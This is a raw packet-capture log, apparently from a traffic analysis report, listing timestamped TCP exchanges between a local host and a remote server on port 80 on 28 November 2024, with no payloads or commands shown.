                                                                      Nov 28, 2024 10:06:17.229723930 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.229759932 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.237253904 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.237274885 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.237303019 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.237323999 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.244889975 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.244950056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.245009899 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.245045900 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.252536058 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.252619982 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.252624035 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.252671957 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.260204077 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.260305882 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.260313988 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.260380030 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.304996014 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.305088043 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.395397902 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.395416021 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.395545006 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.397599936 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.397676945 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.397699118 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.397802114 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.403039932 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.403105974 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.403111935 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.403167009 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.408207893 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.408271074 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.408318996 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.408415079 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.413541079 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.413615942 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.413630009 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.413686037 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.418729067 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.418819904 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.418858051 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.418912888 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.424021006 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.424118042 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.424139023 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.424186945 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.429316044 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.429409981 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.429445982 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.429527998 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.434612036 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.434716940 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.434725046 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.434777975 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.439822912 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.439964056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.441704988 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.441771984 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.441821098 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.441876888 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.444076061 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.444108009 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.444232941 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.444232941 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.448055029 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.448108912 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.448154926 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.448211908 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.452080965 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.452128887 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.452163935 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.452212095 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.456099987 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.456197977 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.456209898 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.456238985 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.460125923 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.460169077 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.460194111 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.460237026 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.464133978 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.464196920 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.464272976 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.464320898 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.468204021 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.468271971 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.468302965 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.468375921 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.472160101 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.472224951 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.472243071 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.472280025 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.476182938 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.476265907 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.476286888 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.476341963 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.480192900 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.480259895 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.480302095 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.480344057 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.484215975 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.484311104 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.484339952 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.484404087 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.488255978 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.488338947 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.488378048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.488378048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.515506029 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.515552998 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.515568972 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.515609980 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.621422052 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.621476889 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.621496916 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.621561050 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.622795105 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.622852087 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.622899055 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.622944117 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.625628948 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.625823021 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.625864983 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.625922918 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.628504038 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.628580093 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.628619909 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.628659964 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.631361961 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.631455898 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.631483078 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.631597042 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.634311914 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.634394884 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.634398937 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.634437084 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.637089014 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.637155056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.637228012 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.637269020 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.640089035 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.640178919 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.640274048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.640274048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.642951965 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.643012047 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.643105030 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.643167973 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.644633055 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.644716024 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.644717932 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.644772053 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.646543026 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.646639109 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.646678925 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.646727085 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.648370028 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.648411036 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.648485899 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.648547888 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.650227070 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.650279999 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.650329113 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.650432110 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.652122974 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.652180910 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.652221918 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.652272940 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.654280901 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.654335022 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.654493093 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.654604912 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.655859947 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.655937910 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.655972958 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.656017065 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.657746077 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.657788992 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.657804966 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.657855988 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.659661055 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.659709930 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.659745932 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.659805059 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.661474943 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.661534071 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.661626101 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.661676884 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.663367987 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.663423061 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.663461924 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.663523912 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.665232897 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.665323019 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.665354967 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.665397882 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.667115927 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.667195082 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.667263031 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.667335987 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.668997049 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.669055939 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.669115067 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.669178009 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.670855045 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.670926094 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.670968056 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.671021938 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.672739983 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.672782898 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.672835112 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.672835112 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.674633980 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.674719095 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.674755096 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.674818039 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.676511049 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.676554918 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.676609993 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.676650047 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.678461075 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.678515911 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.678581953 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.678617954 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.680550098 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.680608988 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.680628061 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.680685043 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.682118893 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.682164907 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.682204962 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.682257891 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.683990955 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.684039116 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.684096098 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.684166908 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.685858965 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.685905933 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.685954094 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.686002016 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.687736034 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.687783003 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.687932968 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.687978983 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.689621925 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.689691067 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.689745903 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.689790010 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.691503048 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.691548109 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.691601038 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.691653013 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.693361044 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.693442106 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.693481922 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.693545103 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.695290089 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.695333958 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.695364952 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.695419073 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.697114944 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.697176933 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.697212934 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.697335005 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.818203926 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.818294048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.818300009 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.818361044 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.818977118 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.819031954 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.819086075 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.819145918 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.820645094 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.820713997 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.821247101 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.821297884 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.821347952 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.821386099 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.822942972 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.822994947 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.823054075 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.823103905 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.824644089 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.824744940 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.824744940 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.824776888 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.826284885 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.826335907 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.826392889 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.826436043 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.828002930 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.828125954 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.828130960 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.828190088 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.829638958 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.829711914 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.829787016 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.829842091 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.831321955 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.831396103 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.831410885 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.831450939 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.832981110 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.833025932 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.833030939 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.833076954 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.834683895 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.834739923 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.834822893 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.834902048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.836355925 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.836401939 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.836525917 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.836585045 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.838013887 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.838074923 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.838187933 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.838234901 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.839713097 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.839832067 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.839842081 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.839894056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.841339111 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.841387033 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.841444969 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.841525078 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.843053102 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.843127012 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.843192101 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.843250990 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.844702959 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.844763041 CET4972480192.168.2.6212.162.149.63
